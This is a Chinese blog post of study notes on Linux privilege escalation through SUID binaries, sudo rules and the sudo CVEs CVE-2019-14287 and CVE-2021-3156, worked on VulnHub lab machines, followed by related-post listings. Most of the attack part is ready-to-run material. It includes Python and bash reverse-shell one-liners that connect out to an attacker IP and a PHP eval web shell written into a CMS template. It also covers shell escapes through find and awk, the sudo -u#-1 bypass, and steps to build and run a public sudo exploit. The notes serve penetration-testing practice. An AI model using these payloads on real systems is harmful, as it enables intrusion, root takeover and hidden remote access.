Linux权限提升二

于 2024-06-01 19:31:24 发布
阅读量409 收藏 3
点赞数 5
文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyw268/article/details/139372312
版权

#应用场景:

获取到Web权限或普通用户在Linux服务器上时进行的SUID&SUDO提权

SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。

#利用参考:

https://gtfobins.github.io/

#Linux系统提权-Web&用户-Suid

1、SUID&GUID

环境:https://www.vulnhub.com/entry/dc-1,292/

命令:SUID GUID

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

项目:LinEnum PEASS-ng

/usr/bin/find . -exec '/bin/sh' \;

2、SUID&SUDO

环境:https://www.vulnhub.com/entry/toppo-1,245/

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

SUID:

/usr/bin/python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.139.141",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#Linux系统提权-Web&用户-Sudo(cve)

1、SUDO

环境:https://www.vulnhub.com/entry/toppo-1,245/

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

SUDO:

cat /etc/sudoers

/usr/bin/awk 'BEGIN {system("/bin/sh")}'

2、SUDO-CVE

环境:https://www.vulnhub.com/entry/devguru-1,620/

-信息收集:

80,8585

http://192.168.139.150/.git/

http://192.168.139.150/adminer.php

http://192.168.139.150/backend/backend/auth

http://192.168.139.150:8585/

http://192.168.139.150:8585/admin

-git泄漏(利用点)

python GitHack.py http://192.168.139.150/.git/

-访问管理(Web入口):

adminer.php 添加用户名密码 登录后台 模版 写入Shell

function onStart(){

//蚁剑连接

eval($_POST["pass"]);

}

-找备份寻突破(升权):

/var/backup/app.ini.bak 修改用户密码 登录后台 写入反弹

bash -c "exec bash -i >& /dev/tcp/192.168.139.141/5555 0>&1"

-利用sudo提权(cve):

sudo -l

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低权限)

gitea数据库配置备份文件泄露 => 连接gitea数据库,找到gitea的用户密码 => 登入gitea,写shell(更高权限) => 提权。

3、SUDO-CVE

环境:kali2020

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

-判断:sudoedit -s / 报错存在

-利用:

git clone https://github.com/blasty/CVE-2021-3156.git

cd CVE-2021-3156

make

chmod a+x sudo-hax-me-a-sandwich

./sudo-hax-me-a-sandwich 0

爱敲键盘的pig
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透常用提权方式总结
j1044957016的博客
06-01 7479
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的间吧
THM Linux权限提升权限提升路径
04-22
创建thm文件,内容为执行的命令,赋予可执行权限,运行test文件,执行命令
LINUX之内网渗透提权
weixin_34268753的博客
03-25 175
在渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方 面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而linux却很少人用系统自带的ssh、iptables自身来处理此类问题。由于间有限,本文只详细的介绍ssh tunnel方面的知识,iptables的有空再...
Linux内网提权
qq_49714982的博客
03-29 701
查看sudo -l 如果 有 (root) NOPASSWD: /usr/bin/git 则可以提权。前提条件:/etc/sudoers 如果为当前权限可更改,则可进行写入普通用户sudo权限。前提条件:当前用户shell为普通用户且有可以利用的命令。普通用户可进行sudo 执行root权限命令。确定在rbash权限下:echo $PATH。(2)执行者对于该程序需要有x的可执行权限。确定可以使用的命令:compgen -c。(3)本权限仅在程序的执行过程中有效。(1)SUID仅对进制有效。
内网提权--linux提权
最新发布
hakksjss的博客
05-20 316
先枚举内核信息(得到那些漏洞可以用来提权)否则无法运行,会提示依赖库不存在等问题。注:尽量保证自己编辑代码的。
内网渗透-权限提升
qq_63980959的博客
04-05 1366
提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站,通过各种漏洞提升webshell权限以夺得该服务器权限提权,顾名思义就是提高自己在服务器中的权限 ,比如在windows中本身登录的用户guest,然后通过提权后就变成超级管理员(adminstrator),拥有了管理windwos的所有权限在Windwos中,权限大概分为四种,分别是Users、Administrator、System、TrustedInstaller。
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
防范权限提升-Linux提权手法超级攻略
08-17
防范权限提升-Linux提权手法超级攻略
内网攻防-提权-Linux
h1nt的博客
08-17 1123
Linux提权一文通 前言 原文来自于https://www.freebuf.com/articles/251884.html 感觉很多都是机翻,还有些大大小小的格式问题 遂去外网找到原文重新翻译排版了一遍,同也参考了原文的翻译 0x01 Linux提权描述 大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件,查看私人信息或安装不需要的程序,例如病毒。通常,当系统存在允许
windows内网本地用户提权
qq_49714982的博客
04-09 575
1.有当前计算机的web权限,建立在web权限取得的情况下进行的权限提升2.符合的操作系统3.符合的溢出漏洞。
内网渗透()之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5754
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
内网(1):Windows提权概述
prettyX的博客
05-21 333
根据DM老师的课程所整理 内容 Windows单机提权 Bypass UAC Bypass AppLocker Windows单机提权 EXP提权 systeminfo wmic qfe get Caption,Description,HotFixID,InstalledOn post/windows/gather/enum_patches Windows-Exploit-Suggester https://github.com/SecWiki/Windows-kernel-exploit
内网渗透 - 提权 - Windows
weixin_30855099的博客
08-22 264
MS提权 MS16-135 MS16-016 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫描 跳板机环境分析 1.具备公网IP,所有端口可直接连接,且可访问外网 - 即可使用正向连接,又可以使用反向连接 2.跳板机受...
关于内网渗透的提权问题
weixin_48421613的博客
06-02 842
最近有小老弟问我,总有面试官问关于提权的问题,总是能把我难住。好吧,面试造航母干活 拧螺丝这句话在哪里都很实用,索性今天也就写一下我认为的提权。 首先呢,其实权限提升这种事情多用于内网渗透,这里指的内网渗透当然不是你处于内网环境的渗透测试,而是那种在攻防演练、护网、打击境外的一些特殊场景,由外网入侵到内网做后渗透的候遇到的权限提升问题。(大佬勿喷,我实在想不到还有哪里做提权,正常安全评估是完全用不到这一项技能的,毕竟传统工艺点到为止) 什么是提权 主要针对在对网站的渗透过程中,通过利用网站或服务器系.
内网渗透基石篇--权限提升(上)
m0_59598029的博客
08-22 523
本文主要从内网权限提升出发,主要介绍一些低权限用户如何通过一些工具和脚本来获取一些高权限。中间介绍了一些脚本和工具的使用,还做了几个实验来理解这些工具。通过网络共享可以访问到GPP的组策略的文件:[外链图片转存中…(img-p58R0UJr-1692624642993)]打开可以看到存储的cpasword密码:[外链图片转存中…(img-hgVbL7Vs-1692624642994)]六、 针对组策略首选项提取的防御措施1.设置共享文件夹SYSVOL的访问权限
Windows/Linux权限提升策略全解析
2. 服务权限提升:攻击者可能利用系统守护进程(daemon)或SSH服务器的漏洞。 3. 用户权限继承:在某些Linux发行版中,子用户可能通过特定权限组合获得父用户的某些权限。 4. 内核权限获取:类似于Windows,可能涉及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值